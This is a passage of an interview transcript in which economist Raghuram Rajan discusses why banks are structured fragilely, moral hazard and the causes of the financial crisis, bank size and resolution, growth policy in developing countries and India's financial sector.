At the same time , banks fund themselves with money that depositors can easily withdraw , and such runs can lead an otherwise healthy bank to fail .
That combination of essential services and unique vulnerability has led many observers and governments to consider and treat banks in “ special ” ways — with federal deposit insurance , for instance .
You ’ve done a lot of research on why banks structure themselves in that way in the first place .
Perhaps we could start with your impressions of whether banks remain special today , and why that would be .
Rajan :
That ’s a very interesting question .
The question really is , “ Why the structured fragility ? ”
Why finance yourself with demand deposits , when on your asset side you have these illiquid assets — term loans , complex positions ?
What ’s the link ?
The alternative , which surfaces every time you have a financial crisis , is to create narrow banks — that is , have money market instruments on your asset side financed with short - term demand deposits on your liability side .
If you really want to hold illiquid assets , finance them with long - term borrowing , not explosive short - term debt .
Why the private banking sector has never chosen safe narrow banking ( with finance companies issuing long - term liabilities and making illiquid loans ) is really the puzzle of the ages .
It ’s interesting because the form of the bank seems relatively similar across countries and over time .
It ’s a form that has endured , perhaps longer than the corporation .
You can go back to Mesopotamia perhaps , but certainly to Italy , and they had banks in much the form that we have today .
Doug Diamond [ also at the University of Chicago ] and I have been puzzling over this for some time .
Part of the answer is the Calomiris and Kahn view1 that when you have short - term liabilities , it puts much more discipline on bank management and therefore they have to commit to , in a sense , not do anything crazy with your money .
Feldman : Could you spell that out a bit more ?
Why do short - term debt holders put more discipline on management ?
Rajan :
Banks deal with money , and money is very fungible .
If the bank manager borrows on a 10 - year basis , by the time the debt holders come to collect , a lot could have happened with that money .
It could be away in the Bahamas , funding the bank manager ’s new lifestyle .
And so you need something that checks the bank manager on a more regular basis , and with short - term deposits , which keep going in and out , there ’s somebody who ’s checking if the banker has got the ability to pay on a regular basis .
If depositors take fright , they could run , and that ’s a big source of discipline on the banker , so she or he has to maintain the sense that the bank is liquid and solvent .
Of course , when you ’re financing long term , it ’s hard to offer such a commitment .
If you [ the banker ] say , “ Give me 30 - year money to fund this complex project , ” it would cost a lot for the investor to part with 30 - year money .
But if you say , “ Give me demand deposits , ” where you can have your money back tomorrow if you get frightened , it ’s much cheaper to fund the 30 - year stuff .
So the mismatch is , in a sense , deliberate rather than unfortunate .
That was one aspect .
But the other thing , which is a little more subtle , is that this allows the bank manager to some extent to pass on his human capital skills without charging a big rent for it .
That ’s the part that we add to Calomiris and Kahn .
The idea is simply this :
The bank manager could invest in long - term assets , turn around to the short - term debt holders and say , “ I ’ve made all these investments , they ’re valuable , but you do n’t have a hope of getting the money back .
I know how to get the money back , you do n’t , so pay me extra for it . ”
Strategic debt renegotiation takes place all the time with long - term debt holders , and it would increase the amount debt holders would charge to give their money to the bank .
This is where the nature of the demand deposit comes in .
Because as soon as the depositor takes fright , the depositor runs , regardless of what ’s on the table in terms of offers .
So the bank manager , if he ’s dealing with a sensible liability holder , can have this conversation and extract some rent for his capabilities .
But if he ’s dealing with a demand depositor , that conversation does n’t take place .
Practically speaking , demandable debt is a non-renegotiable hard claim , which is why it is especially cheap .
So it ’s the craziness of the depositor , the fact that he ’s going to run as soon as he suspects that he ’s going to be dispossessed in some way , which makes the deposit a cast - iron claim .
It works very well when banks are undertaking the normal course of business .
It works very badly when you have a systemic crisis like the one we ’ve seen .
So banks in general work well when the probability of systemic crisis is relatively small .
GOOD TRAITS , WITHOUT THE BAD ?
Feldman :
What options are available — are there options available ?— to get the benefits of the structure of banks regarding the loans they make and the other special offerings they provide without getting the bad , the threats of runs ?
Since these forms of banking seem to arise , as you said , spontaneously over time and across countries , it must be optimal in some sense .
But could you get 80 percent of the good , without the bad ?
Rajan :
This is what people have been trying to do for a long time , right ?
We have a “ narrow banking ” proposal which resurfaces every time we have a crisis .
We heard [ Bank of England Governor ] Mervyn King say it yesterday , “ Let ’s break up banks into money market funds and finance companies . ”
We ’ve had that option available for so many years , and it has n’t been implemented .
Now if there is value to the way banks are structured today , what we would like to do is reduce the probability of systemic breakdown .
The truth is it ’s hard to do this without eliminating the discipline .
What you really want to do is prevent bank runs when it ’s truly a systemic panic , but not when it ’s because of the fault of the bank itself .
You want a bank to face the full costs of any stupid thing it does on its own .
The downside to any proposal which tries to deal with this is that you could get a systemic breakdown when banks also herd together in taking the same kind of risk .
They all take on mortgage - backed security risk , for instance , because they now know that you [ the federal regulator ] will come in and save them .
So the current system where there is some element of the Fed coming in when there ’s a systemic breakdown is an attempt to get over some of the problems of the bank ’s fragile structure itself , but it creates moral hazard , which is why they all herd on the same risk .
Feldman :
What would happen if we all took Mervyn King seriously , or [ former Fed chair ]
Paul Volcker or the other folks who suggest this separation ?
Five years after we adopted that reform , what would we be losing ?
Rajan :
If you believe that banks are a viable entity , independent of deposit insurance , independent of too big to fail , that there ’s a natural benefit to the bank structure we have today , that would suggest that if you then mandated separation , you would have much higher costs of long - term intermediation .
The money market fund would be reasonably stable , presumably , and will continue to invest in fairly liquid instruments — that will not be a problem .
But it would be a problem on the other side — the finance company funded with long - term debt : Long - term projects would find finance very costly .
Feldman : Right .
And less lending , less growth .
Rajan : Less lending , less growth .
The other thing I think is worth thinking about is , is it really possible to completely isolate a sector of the economy and make it fail - safe , and put all the risk in the other sectors ?
Do n’t the problems then migrate to the area you ’ve said we ’ll regulate less , but which is taking all the risk ?
Put differently , I think only part of the problem in this crisis was that we were trying to protect depositors , and limit their losses .
Part of the problem also was with the investment banks , where we were n’t concerned about protecting the depositors .
We were protecting the investment banks , rightly or wrongly , because they are so intimately connected with the markets .
I worry about breaking up banks into “ fail - safe ” parts and “ failure - prone ” parts .
Some of that effort might be useful in terms of cleaning up the bank structure ; it might be helpful to delineate parts without actually breaking them up .
You make the insured parts less liable to some of the risk of the other parts , if you can do that .
But at the same time , I think that we have to be very skeptical that we will solve the problem of moral hazard , because even within the unregulated , risky part , we may still want to come in and provide protection because there are some entities that are closely linked systemically .
Feldman :
So if those proposals worked , there ’d be less growth , of some magnitude .
But it ’s not clear they will work .
Rajan : Exactly .
DOUBTS ABOUT DIMINISHING RISK
Feldman :
In a prominent Jackson Hole paper , 2 you talked about some of the technologies of banking that people thought were going to distribute risk widely and therefore diversify it , making the financial system and financial institutions less risky .
It was less clear to you that risk reduction was actually occurring .
Could you talk about how you came to that view and how important you think that was in the current crisis ?
Rajan :
One of the things I was asked to do was to look at the development of the financial sector , and I have great admiration for some of the things that have happened .
There have been good things in the financial sector which have helped us .
But to some extent there was a feeling that when you distribute risk , you ’ve reduced the risk of the banking system .
My thought was , what business are the banks in ?
They ’re not in the business of being plain - vanilla entities , because they ca n’t make any money that way .
They are in the business of managing and warehousing risk .
So if it becomes easier to lay off a certain kind of risk , the bank better be taking other kinds of risk if it wants to be profitable .
And if the vanilla risk is going off your books , presumably the risks that you ’re taking on are a little more complex , a little harder to manage .
That was the logic which led me to argue based on distance - to - default measures for banks that they were not becoming less risky — I saw that distance - to - default measures did n’t look like they were coming down despite all this talk about securitization and shifting risk off bank books .
That struck me as consistent with my view that maybe the risks that banks were taking on were more complicated .
Whether they were excessive or not , I could n’t tell .
Also , as I saw the mood , I became worried .
Having studied past financial crises , I knew that it ’s at the point when people say , “ There ’s no problem , ” that in fact all the problems are building up .
So that was just another indicator that we should be worried .
I should add that while I thought we could have a crisis , I never thought that we ’d come to the current pass .
However , I did argue that it could be a liquidity crisis , it could well be centered on the banks because banks were taking more of these risks , and even though banks in the past had been the safe haven , they could be at the center of this problem .
So , one strand of my argument was based on the business of banks , but the second strand was to think about the incentive structure of the financial system and say that while we have moved to a compensation structure that penalized obvious risk , risk that you could see and measure , that may have made employees focus on risks that could not be measured .
An example of that is “ tail risk , ” because you ca n’t measure it until it shows up , and it shows up very infrequently .
So part of the reason I was worried was that people were taking more tail risk ; an insurance company writing credit default swaps was just one example of that .
It did n’t require genius at that point to look around and say the insurance companies were writing these credit default swaps as if there was no chance on earth that they would ever be asked to pay up , so they were really taking on tail risk without any thought for the future .
AIG should not have been such a surprise to the Fed .
Feldman :
Ex post it was clear to everyone that the incentives were aligned so that firms were taking on risk that people did n’t understand , but at the time there was push - back to what you were saying .
Why did it not seem true to other people at that time , do you think ?
What kind of comments did you get ?
Rajan :
There were two reasons for the push - back .
One was just the venue .
This conference was almost a Festschrift [ farewell tribute ] to Greenspan , and it seemed to some — though it was n’t intended as such — that I was raining on the parade .
This was his farewell , and I was talking about problems that had arisen during his tenure .
But the bigger issue was the collective sense that the private sector could take care of itself , and if not , the Fed would be able to clean up .
We had been through two downturns : the 1998 emerging market crisis and the 2000 - 2001 dot - com bust , and we had understood the tools that were required .
In 1998 , it was a short reduction in interest rates , not a dramatic one .
In 2000 - 2001 , it was a dramatic reduction .
And these “ successes ” led to a feeling that “ the Fed can take care of it . ”
You know the argument : Typically , the private sector will have the right incentives .
Why would they blow themselves up ?
Regulators are n’t that capable :
They ’re less well - paid and less informed than the private sector , so what can they do ?
And finally , if worse comes to worst , the Fed will pick up the pieces .
I think there are three things wrong with this argument , one for each of those elements .
Private sector —yes , it can take care of itself , but its incentives may not be in the public interest ; may not even be in the corporate interest if corporate governance is problematic .
So the trader could fail the corporation , could also fail society .
That ’s one problem .
Second , the public sector has different incentives from the private sector , and that ’s a strength of the public sector .
When we ’re talking about regulators , because they ’re not motivated in the same way as the private sector , they can stand back and say , “ Well , I do n’t fully understand the risks you ’re taking , but you are taking lots of risk — stop . ”
So I think we ’ve made too little of the incentive structure of regulators which should be different , can be different , which gives them a role in this , rather than saying they ’re incompetent and they ca n’t do it .
I think they can .
But the third aspect was that I think we overestimated the ability of monetary policy to pull us out of a serious credit problem .
The previous problems we had dealt with in the U.S. were not credit problems .
They were standard , plain - vanilla recessions .
The bank system was still active , so monetary policy was n’t pushing on a string :
The Fed brought down interest rates , and things did come back up .
When credit problems arose — and real estate was central to credit problems because of the real estate securities which ended up on bank balance sheets — then the banks were incapable of being part of the transmission process , and now monetary policy lost a lot of traction , so it was n’t simply a matter of cutting interest rates and seeing everything come back .
Feldman : People might have thought after the banking crisis of the 1980s and early 1990s — which did not have the same macroeconomic effect as this crisis — that they could respond effectively .
Rajan : Exactly .
I guess we did n’t see anything as big , as deep in the recent past .
And there was a certain amount of hubris that we could deal with this .
WHY WAS THIS CRISIS SO SEVERE ?
Feldman :
Why do you think this financial crisis was more severe ?
There are lots of potential explanations .
Some observers point to the failure of credit rating agencies ; others point to flawed incentives in compensation and to the creation of new financial products as examples .
If you had to list the two or three things that you think really underlie why there was so much risk - taking , why more risk - taking than people thought , what ’s the deep answer for that ?
Rajan :
You can go right to the meta- political level , but let me leave that aside for now .
If you hone down on the banking sector itself , I think it was a situation where it was extremely competitive .
Every bank was looking for the edge .
And the typical place to find the edge is in places where there are implicit guarantees .
Feldman :
So you think moral hazard had an important role ?
Rajan : I suspect it was not irrelevant .
This is where I think the most damaging statement the Fed could have made was the famous Greenspan doctrine : “ We ca n’t stop the bubble on the way up , but we can pick up the pieces on the way down . ”
That to my mind made the situation completely asymmetric .
It said : “ Nobody is going to stop you as asset prices are being inflated .
But a crash is going to affect all of you , so we ’ll be in there .
By no means go and do something foolish on your own , because we ’re not going to help you then .
But if you do something foolish collectively , the Fed will bail you out . ”
Feldman :
And people read that to be broader than monetary policy ?
Rajan :
It could mean many things .
Even if it was just monetary policy , my sense is one of the tail risks that was prominent in this cycle was liquidity risk .
People were acting as if liquidity would be plentiful all the time .
And my sense of what the Fed does , in part , by reducing interest rates considerably is help liquidity , and so there was a sense that , well , we can take all the liquidity risk we want , and it wo n’t be a problem .
Of course , it turned out that not just interest rates mattered ; the quantity of available liquidity or credit also mattered at this point .
And that was the danger .
Feldman : I think that ’s right .
We have not heard that much discussion of that , but that ’s my inclination as well , that moral hazard played a role .
I do n’t know how big it was , but it certainly was n’t zero .
Rajan : Right .
Absolutely , absolutely .
PUTTING CREDITORS AT RISK
Feldman :
If you agree that moral hazard contributed to the current financial crisis , what can we do today to put creditors at risk of loss ?
Rajan : I think one option is to write it into the contract — the contingent capital bonds that Mark Flannery and the Squam Lake Group have been advocating would make creditors bear losses almost automatically , but in the process stabilize the bank .
A second option is to strengthen resolution authority in as transparent a way as possible .
The point is that creditors should have a very good sense of the kind of losses they will have to bear , but those losses can and should be imposed .
There is , of course , a possibility that this will make banks more fragile , because short - term debt , anticipating losses , will run .
But banks then will choose whether to continue financing themselves this way or alter their capital structure .
A key part of making banks more “ resolvable ” is first , for the relevant regulator to have the legal authority to continue or abrogate contracts that might impose significant costs on the taxpayer and , second , for the bank to have a much simpler capital and organizational structure .
In this regard , requiring them to create “ living wills ” that indicate how they could be resolved could be an important incentive for them to collect information on their assets and liabilities , and simplify their organizational structures .
CORRUPTION , IDEOLOGY , HUBRIS OR INCOMPETENCE ?
Feldman :
One thing you have n’t mentioned as a proximate cause is issues around “ crony capitalism . ”
Some seem to argue that banks were allowed to grow large and complex because they were run by friends or colleagues of people who were in power .
And for similar reasons , these firms got bailed out — because they had colleagues and friends in “ high places . ”
Given that you ’ve thought a lot about that in your own writing , given that you were at the IMF [ International Monetary Fund ] where you had the ability to look across countries where it is an issue , how important would you say crony capitalism is in the U.S. context in the current crisis ?
Rajan :
Let me put it this way .
There is always some amount of regulatory capture .
The people the regulators interact with are people they get to know .
They see the world from their perspective , and , you know , they want to make sure they ’re in their good books .
And so it ’s not surprising that across the world , you have a certain amount of the regulators acting in the interest of , and fighting for , the regulated .
Beyond that :
Is there naked corruption , or less naked corruption ?
“ If you do my work for me as a regulator , then you can come and join me as a senior official in my firm , and I ’ll pay you back at that point . ”
I ’m sure there were stray instances of that , but that to my mind , would n’t be the number one reason for this crisis .
I think I would put more weight on a sense of market infallibility which pervaded the economics profession , not just regulators .
If you think about growth theory , for example , and all the focus on institutions , saying that you need to get to a good level of institutions , and after that everything is hunky - dory .
Or take macroeconomics , we do n’t bother about micro details because the micro details work fine .
So only the macro picture , forget the plumbing – it is unimportant .
I think across the field of economics , we stopped worrying about the details in industrial countries because we said , by and large , things get taken care of .
Yes , there is the occasional corporate fraud or misaligned incentives , but those are aberrations rather than a systemic problem .
So I think this view , that you could n’t have a large systemic problem , this was the problem .
Overlaid on this was the view that regulation was less and less important .
We put excessive weight on the private sector getting it right on their own without understanding that the private sector can also break down — the board may not know what management is doing , management may not know what the traders are doing , so that process can break down .
But even if everybody is working in the interests of the corporation , the corporation may not be acting in the interests of the system .
We ’ve seen all these things happen .
So the regulatory system had a role to play , and it did not play that as much as it should have .
Feldman :
Do you mean that there were n’t the right rules governing the firms or that the folks who were supposed to enforce the rules were in some way prevented from doing that effectively ?
Rajan : I think it may have been a little bit of both .
I think there were rules on the books that were n’t particularly well - enforced .
One thing the regulatory system is good at is ferreting out situations where people are doing something flagrantly wrong .
But there was a sense within the system that this would not be a high - payoff activity , and there was also a tremendous amount of political pressure , not to protect friends , but to encourage certain kinds of low - income lending .
I think that pervaded the system .
I ’m positive that there were situations that we will discover in hindsight where excessive influence was used .
There ’s cronyism .
In a crisis like this , it ’s hard to escape it .
But I ’m less convinced that systematic cronyism was the reason for this .
I think ideology was part of the reason we went wrong , as also was the hubris built up over decades of fairly strong growth and deregulation .
Feldman :
It also sounds like you ’re putting a fair amount of weight — perhaps reflecting some of your own work — on how firms are organized and imperfections in that organizational structure .
Is there anything else you ’d want to add about that component ?
Rajan : No , no .
I guess I ’m paraphrasing Churchill , but my tendency is not to attribute to malevolence what can be more easily attributed to incompetence .
I think there are a fair number of situations where things did n’t work out as advertised .
Feldman :
But you ’re talking about more than incompetence , right ?
You ’re talking about the incentive structures within firms that would lead people to act as if they were incompetent .
Rajan : I ’d even go one step further and say you do n’t have to offer an explanation that relies on evil people or corrupt people .
The entire crisis can be explained in terms of people who were doing the right things for their own organizations .
You can even argue that it was not that they were misdirected by their own distorted compensation structures ; they thought they were doing the right thing for their organization .
But when you added it all up , it did n’t add up to doing good for society .
And that ’s where we have the problems .
RESPONSES TO THE CRISIS
Feldman :
So we ’ve talked about the crisis itself and some causes .
Can we talk a little bit about the responses ?
One proposal that would n’t seem to flow from what you ’ve said is the idea of not just splitting commercial banking from the securities and trading , the Mervyn King kind of idea .
But another is the idea that somehow we should just make the firms themselves smaller — literally smaller — and that will prevent this from happening again .
Perhaps it will make the firms less influential , if you think there are some cronyism problems .
What do you make of that argument ?
Rajan :
You know , it ’s a nice argument to put forward .
I ’m much less clear about how it would work practically .
I ’m also a little worried whether this is a knee - jerk reaction to what we ’ve seen this time around .
So let me start with the second point first .
One of the U.S. responses to the Great Depression , or at least the response of U.S. academics , was to point to Canada and say , no banks failed there .
So at that time , the problem was there were too many small U.S. banks , they were undiversified , they all took the same risk in terms of credit risk , real estate risk , farm risk , and they collapsed .
The argument then was that Canada did n’t collapse because they had these large banks that were big enough to be diversified and they had no problems .
But , of course , now we ’re saying , we have these large banks , and if we break them up , we will solve the problem — of course , Canada still has big banks that did not fail , but now they are an inappropriate benchmark .
It seems to me that according to this line of reasoning , any structure that did n’t exist in the most recent crisis is the right one .
Now we ’re seeing more small banks go under , so maybe in a few months , we will absolve the large banks of blame .
More sensibly , what we really need to argue about is why size may have mattered .
Clearly part of the problem is the too - big - to - fail ( TBTF ) issue that you worked on and pointed out in the past .
And here the idea is that one way to prevent TBTF is to have small banks .
But are they any safer than big banks ?
Having a hundred small banks exposed to the same risk may actually be riskier than having one large bank exposed to that risk .
But the other problem is , when you look at the size of U.S. banks relative to U.S. corporations — when you look at capitalization , for example , the equity capital of U.S. banks has actually come down relative to U.S. firms , compared to what it was in the past .
U.S. firms have also grown big over this time .
You have $ 400 - 500 billion capital companies , and the largest U.S. bank is in the region right now , with shrunken capital , of about $ 200 billion , if not less .
So they ’re not extraordinarily big in terms of equity capital .
Now , you may argue leverage today is higher .
I think there is some question about how you measure that leverage .
But if U.S. corporations are bigger , the risks that U.S. banks have to take in lending to a U.S. corporation are also bigger .
So we should make sure that we ’re comparing apples and apples when we look over time .
Have the U.S. banks become unconscionably big relative to what they were ?
One way to look at that is concentration ratios .
In the U.S. , they ’re not particularly high .
Another way is to look at asset size relative to corporations .
Again , they do not seem too big .
So , the problem may be that these banks are really , really difficult to manage once they get to some size like this .
I think what we ’ve seen in terms of patterns — and there ’s some research emerging on this — is some banks have a history of messing up time and again , a DNA of bad management , or excessively risky management .
These are also banks that make a ton of money in good times , but lose it all in bad times — so , highly volatile earnings profiles .
I think there ’s more value to looking closely at them to see if there are ways these “ bad ” banks can be discouraged from increasing their size and maybe even encouraged to shed some assets .
Feldman :
You would do something targeted , based on past performance ?
Rajan : I would target based on past performance , rather than make it a blanket “ you ca n’t grow beyond this size ” — though there are obvious dangers to giving regulators carte blanche to subject banks to differential treatment .
I would also look at mergers with a very jaundiced eye going forward — I would ask , “ What ’s the benefit of having a trillion - dollar company merge with another trillion - dollar company ? ”
If you want to grow organically , by all means do so , and as a supervisor I ’ll pay attention if you grow too fast , but micromanaging what size you should be seems to me is a little limiting .
I think so long as you discourage mergers of megabanks , you can get half the way to the goal of getting banks of manageable size , because banks at least for a while will be shrinking .
WHY SOME COUNTRIES GROW
Feldman :
We ’ve talked about the role of financial systems in economic growth , noting that fundamental changes to the structure of banks could reduce growth .
You have done much work on the factors that are important to country growth , particularly for developing countries .
What are the key factors that lead some countries to grow and others not ?
Rajan :
One of the potential dangers of this crisis is essentially that we might throw out everything good that we know markets do and say they do only bad .
Feldman : That “ capitalism has failed . ”
Rajan : Right .
Capitalism has n’t failed .
I think capitalism has always been subject to a certain amount of boom and bust , and every time we have a bust , we try to figure out what went wrong and try to fix it — this is a natural process of development .
But the broader principle is that free - enterprise capitalism , despite its flaws , is a reasonable system , and it does create the greatest good for the greatest number of people .
That , I think , is beyond doubt .
So then the question is , how do we get the right capitalism in these countries ?
As we learn more , I think the view of growth for these countries is becoming more nuanced .
There ’s a view held just a short time back of “ build the institutions and then everything will take off . ”
Well , you know , you ca n’t build the institutions in a vacuum .
We need public support for these institutions .
Imposing the U.S. Constitution on Liberia did n’t make Liberia the United States .
It made Liberia Liberia , because the people in Liberia , and the kind of power structures , viewpoints and culture they had , were different from the people in the United States .
So you need support for the kinds of institutional structures you ’re putting down on the ground , and often , it ’s growth that produces that support .
That support does n’t come independent of the growth process itself .
A second point is that the institutions by themselves are not enough .
Sometimes we say , “ Create a market structure , and then the firms will emerge and so on . ”
I think there is something to be said for the fact that firms do n’t emerge spontaneously , at least of reasonable size , except over a long period .
So let the market flourish for years and years , as it has in the United States , and over time you get the Rockefellers , the Carnegies .
They set up their firms , they become big firms and the United States becomes the strongest economy in the world .
Emerging markets in developing countries do n’t seem to have that time .
They want to grow like Korea and Japan .
And it seems to me that in that accelerated growth path , there ’s more management by the government than in the more organic growth path .
There was still some amount of management , some amount of protectionism in the U.S. and the U.K. when they grew , but there ’s a lot more intervention in these newer , rapidly growing countries .
I think the difficulty for these countries is they have to perform an act which no other developed country has had to do , apart from Germany and Japan , which is to have the government manage the process up to a certain point and then back off totally and let the market forces take over .
That switch , it seems to me , is extremely difficult .
And it ’s also a problem for the financial system because in that early phase , the government is doing a lot of directed lending — you ’re telling the banks whom to support ; you ’re giving them subsidies to support the right guys .
There ’s a lot of intervention in this process .
And then suddenly , you tell the banks they are on their own and have to find profits through competitive lending .
Few systems survive the shock .
Feldman :
Are you saying that significant government intervention into the economy is going to happen anyway , so we should recognize that , or are you saying that such intervention is constructive because it helps economies to grow ?
Rajan : I think it may well be constructive , at least in the initial phases , because it creates the organizational capabilities .
In developing countries , the financial system is very reluctant to finance small - to medium - size firms .
It ’s too risky .
They just do n’t touch it .
So if you say organic growth , let them grow naturally , let the good ones come out of the primordial ferment — nothing happens !
Imposing the free market , it seems to me , in the first few years on those countries , does n’t work , which is why there ’s so much impetus for intervention .
The question is , when do you stop ?
If you do n’t stop at some point , then it becomes the crony capitalism that you referred to earlier .
It ’s the friends and relatives of those in power who benefit from growth , and then growth tends to peter out because the inefficient are propped up .
Feldman :
So how do countries figure out how and when to … ?
Rajan :
It ’s extremely difficult .
And this is why I think a lot of growth success is serendipitous .
For example , in India , the reason we broke away from that crony capitalist model where licenses were given away to the favored families and the favored families got cheap credit from the state - owned financial institutions is we had a crisis , a huge crisis , in 1990 .
India had to open up .
It was opening up slightly before , but this was when the rubber hit the road .
Mind you , if India had opened up in 1960 , we would not be talking about China as much now .
We ’d be talking of India because it would have grown so much more over that period .
On the other hand , if India had opened up in 1947 when it got independence , it may still have been a basket case .
There was a right time , after you ’d built some institutions — maybe ’ 65 , maybe ’ 70 .
But India actually opened up in 1985 .
Feldman :
So you ’re skeptical of a common playbook that ’s going to work across many countries .
There ’s some point at which countries need government intervention and other points at which countries need free markets , and that transition has a lot of luck associated with it .
Rajan : Absolutely .
Because that transition does n’t come naturally .
In fact , the forces are all against that transition , because the vested interests that have built up in the period of managed growth do n’t want it to open up .
On the other hand , if you started off with free markets , which is what a number of economists have been advocating , maybe you do n’t get any organizational capabilities .
Maybe you need a little bit of protectionism initially ; maybe you need to create organizations .
But you need to break off from that at some point because markets and competition have tremendous virtue .
BACK TO REGULATION
Feldman :
Let ’s get back to the financial crisis just for a minute , if we could , to discuss the proper role of government in that context .
Some observers harken back to the 1960s and 1970s , at least in the U.S. , when there was more regulation , and banks were more protected .
They seem to connect that type of regulation to the few bank failures of that period , and so they suggest we would be better off if we were to return to more significant regulation .
It strikes me that this view misses the costs of such a heavily regulated banking system , but what is your view ?
Is there any merit to consider going back to a regulatory system that looks like the ’60s and ’ 70s in the U.S. ?
Rajan : I do n’t think so .
The reason that worked so well was that there were huge rents built into the banking system .
Remember when we got toasters instead of interest rates ?
Clearly , you shovel enough profits into a system and it will be stable , because the system does n’t want to lose that money .
The reason the banking system is less stable now is that it ’s far more competitive .
I think that ’s one effect .
The other is , the United States ( and the rest of the world ) has a far more dynamic and competitive economy than it used to have .
The United States in the ’60s benefited from the tremendous advantage it still had over many of the countries in Europe , and Japan , which were still recovering from the war .
They had almost reached the point where they had fully recovered , but not quite .
That advantage , by the ’70s and ’ 80s , had dissipated .
That means you needed a financial system to restructure , to send flows from one place to another .
And one of the advantages of the system of the kind that the United States has is that the restructuring happens more effectively — and there ’s some evidence for this — that the sunrise industries tend to get more funding than in a relationship or old - style financial system .
So I think the strength of the United States ’ economy is based on its dynamism .
Going back would make us lose that dynamism .
What I think we need is to get the dynamism with a little less risk .
That means let ’s avoid bringing back all these old solutions .
I do n’t think the banking system can be made more boring .
Anyone who advocates that does n’t understand banking today .
Now , I think it can be made less risky , but that requires a lot of thought , and these very Draconian solutions , it seems to me , would throw out much of the baby with the bathwater .
INDIA ’S FUTURE
Feldman :
We know you ’re closely involved in India as an adviser and in a variety of different roles .
What does the future look like for India ?
What kind of advice are you providing regarding India ’s financial sector ?
Rajan :
Well , I chaired a committee which wrote a report for the Indian government for financial sector reforms , and slowly elements of that are being implemented .
The vision we had was for a system which is innovative and inclusive , but also we focused a lot on trying to reduce risk in the system .
So it was , to some extent , learning from this crisis as it was developing .
Some of the things that have been suggested here in the United States , I think , we made those suggestions earlier in that report .
But it was n’t rocket science .
You need more coordination amongst the regulators .
You need to have various forms of resolution for these entities .
There are also very low - hanging fruit in India .
An effective bankruptcy court for corporations , for example , would be useful .
The current bankruptcy court does n’t work .
So , how to strengthen the bankruptcy court so that then you can have corporate bond markets , which then can serve as a buffer between various financial institutions .
Right now you are ostensibly borrowing from finance companies , but the finance companies borrow from banks , so essentially you are borrowing at one step removed from the banks themselves .
My sense is that improving the financial infrastructure in India could do wonders for creating some of the buffers and improving the resilience of the financial system .
Because there are lots of low - hanging fruit for India to pick , I have confidence that unless there ’s a huge political problem or there ’s a totally incompetent government — which seems to me unlikely — then there is a fair amount of growth ahead for India .
India has done some of the harder things .
For example , it has created a knowledge sector , a pharmaceutical sector , IT sector , while not having done the more basic stuff — that is , building the big roads and the bridges , which do n’t take rocket science , which just take execution , the right amount of capital and so on .
If India focuses on doing that and moves more of its population out from agriculture into industry , rural industry or services , I think that in itself will create a tremendous amount of productivity growth which can take India forward for the next 10 or 15 years .
If India is growing at 7 or 8 percent without all that happening , add a few percentage points with that happening , and you ’ve got pretty solid growth for a long time .
The other thing that I think is extremely interesting is , because much of the population is poor , there are whole new ways — this certainly came out in the Wall Street Journal yesterday3 — whole new ways that firms are trying to reach that population , which is creating a whole new range of innovation , some of which to my mind will feed back to the West .
I was in a meeting just before this at the University , where a doctor was speaking about what he was doing in India .
One of the things he was saying is that the way Indian hospitals do operations , and the way they treat the very poor , is actually a blueprint for how we can treat the very poor in this country .
It ’s not that the poor in India settle for lower value .
It ’s that they settle for no frills while getting value that they need .
Cataract operations , for example , are immensely important in India .
Tons of people with cataracts in their eyes ; they ca n’t see .
It ’s a very simple operation .
And in India , they ’ve actually mass - produced the operation now and can do it for a fraction of the cost it used to cost in India , let alone what it costs here .
It ’s down to its basics :
How many things do we need to do ?
It ’s back to the mass production revolution that we had here , except it ’s now done in other arenas .
I ca n’t resist this .
I was at a meeting the other day with the head of an international auto company .
We were talking about design , and he said when he wants something designed for a low - income population , no - frills , he can’t send it to his industrial country designers .
Their immediate instinct is to add on all the frills .
He sends it to the low - income country designers because those guys have a mentality of saying , “ Do I really need this or not ? ”
Feldman : Right , so you ’re taking some high level of sophistication and putting it in a different context so it can be applied differently .
Rajan :
It ’s not just that .
They start bottom - up .
They say , “ What are the things I really need here ?
And then let me bring in all the technology for what I really need , but let me just put in what I need .
” The shift in demand to emerging markets will also imply a huge change in the value - added services that accompany products — services such as innovation , design , advertising , marketing , distribution and finance .
These services are right now being provided by industrial countries and their companies but will move over time to the emerging markets .
THE ECONOMICS PROFESSION
Feldman :
We just talked about the economics profession and what has worked well or has n’t worked well .
There ’s been a lot of discussion about saltwater and freshwater schools in economics recently .
4
I think you have an interesting background to talk about that since you ’re at the [ freshwater ]
University of Chicago business school and you ’ve done a lot of work about financial systems , but you got your Ph.D. at [ saltwater ] MIT .
Do you have a view about what the economics profession did n’t do well ?
And what the economics profession ought to be focused on going forward ?
Rajan : I have a take on this , yes .
But first , one has to remember that the saltwater economists , so to speak , were crowing victory in 1969 .
You see quotes from Paul Samuelson and Bob Solow [ at MIT ] saying essentially that the business cycle is dead ; we have learned how to deal with it .
And we know what happened after that .
I think there is a problem with economics when it thinks it has solved all the traditional problems .
That ’s when economics slaps you in the face and says , “ Not so fast ! ”
The reason rational expectations in macroeconomics and efficient markets in finance are under attack now is not so much because people can tie specific failings to these theories but because they ’re the dominant part of the economics or finance profession right now .
So I think debate has gone a little off track , in the sense of saying , “ You were responsible . ”
Would any of the neo-Keynesians have done any better ?
There were many of them in the Clinton administration where some of this stuff built up .
Would anybody pin all this on the Bush administration only ?
No , it ’s a systemic problem .
So , I think the debate about “ economics is to blame , ” well , yes , it is to blame to the extent that it did n’t pick up on some of what happened .
But this crisis is problematic for all broad areas of macroeconomics or even of finance .
It is clear that there are many areas of economics that have studied the problems we saw in this crisis .
For example , the banking and corporate finance guys have looked at agency problems , looked at banking crises , etc .
The behavioral theorists have inefficient markets and irrational markets .
So , again , the profession as a whole , I do n’t think , deserves blame .
It has been studying some of these things .
The central question is why certain areas of economics , particularly macroeconomics , abstracted from the plumbing , which turned out to be the problem here .
My sense is that that abstraction was not unwarranted given the experience of the last 25 to 30 years .
You did n’t have to look at the plumbing .
You did n’t have to look at credit .
Monetary economists thought credit growth was not an issue that they should be thinking about .
Interest rates and inflation were basically what they should be focusing on .
The details of exactly how the transmission took place were well established , and we thought they would not get interrupted .
Well , we ’ve discovered they can get interrupted .
The natural reaction is now to write models which have the details of the plumbing , and you see more of that happening .
So I think what the macroeconomists did was not because they were in the pay of the financial sector or consultants of whatever [ laughter ] , as some have said .
But I think it was that that was a useful abstraction given what we knew , and it ’s no longer an abstraction that we can ever undertake now .
GOVERNMENT’S ROLE IN HOUSING
Feldman : I ’m curious about any thoughts you might have about the role of the government in the housing sector .
What role should the GSEs [ government - sponsored enterprises , such as Fannie Mae and Freddie Mac ] play ?
